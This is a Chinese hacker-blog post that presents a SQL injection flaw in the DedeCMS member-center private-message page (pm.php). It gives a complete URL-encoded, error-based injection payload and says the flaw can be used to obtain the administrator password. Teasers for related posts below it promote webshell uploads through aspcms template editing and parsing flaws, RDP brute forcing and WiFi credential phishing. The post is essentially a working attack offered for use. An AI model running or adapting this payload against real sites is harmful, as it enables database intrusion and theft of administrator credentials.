DedeCMS会员中心短消息SQL注射0day漏洞

hacker4年前黑客文章1073

需要:magic_quotes_gpc = Off
DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码:

http://www.chncto.com/de/member/pm.php?dopost=read&id=1

%27%20and%20@%60%27%60%20and%20

%28SELECT%201%20FROM%20%28select

%20count%28*%29,concat%28floor%28rand

%280%29*2%29,%28substring%28%28Select%20%28

version%28%29%29%29,1,62%29%29%29a

%20from%20information_schema.tables

%20group%20by%20a%29b%29%20and%20%27

标签: 黑客技术

相关文章

aspcms后台拿shell的两种方法

aspcms后台拿shell的两种方法: 第一种:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写qxz.asp;.html, 在文件内容写一句话 <%e...

高级入侵防御系统自然环境

高级入侵防御系统自然环境

Advanced Intrusion Detection Environment 翻译中文也叫:高級入侵防御系统自然环境;   什么叫高級入侵防御系统自然环境? 高級入侵防御系统自然环境(...

nginx&IIS7.0&IIS7.5+php解析拿webshell

上传地址:http://chncto.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg 已使用解析拿下shell。...

SolarWinds服务器防火墙安全性管理工具

SolarWinds服务器防火墙安全性管理工具

什么叫SolarWinds? SolarWinds服务器防火墙安全性管理工具(FSM)针对必须在其重要安全防护设备上开展汇报和权威专家管理方法的机构和企业而言是一个非常好的解决方法。该商品的设定和配...

3389爆破服务器技术全过程与原理

其实爆破服务器很简单的,也是必学的。 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启。对...

wifiphisher专用工具完全免费使用方法

wifiphisher专用工具完全免费使用方法

什么叫Wifiphisher? Wifiphisher是一种WiFi黑客工具,能够对无线网络/ WiFi互联网实行迅速的全自动互联网中间人攻击,目地是发觉客户和登陆密码凭证。   与无线网...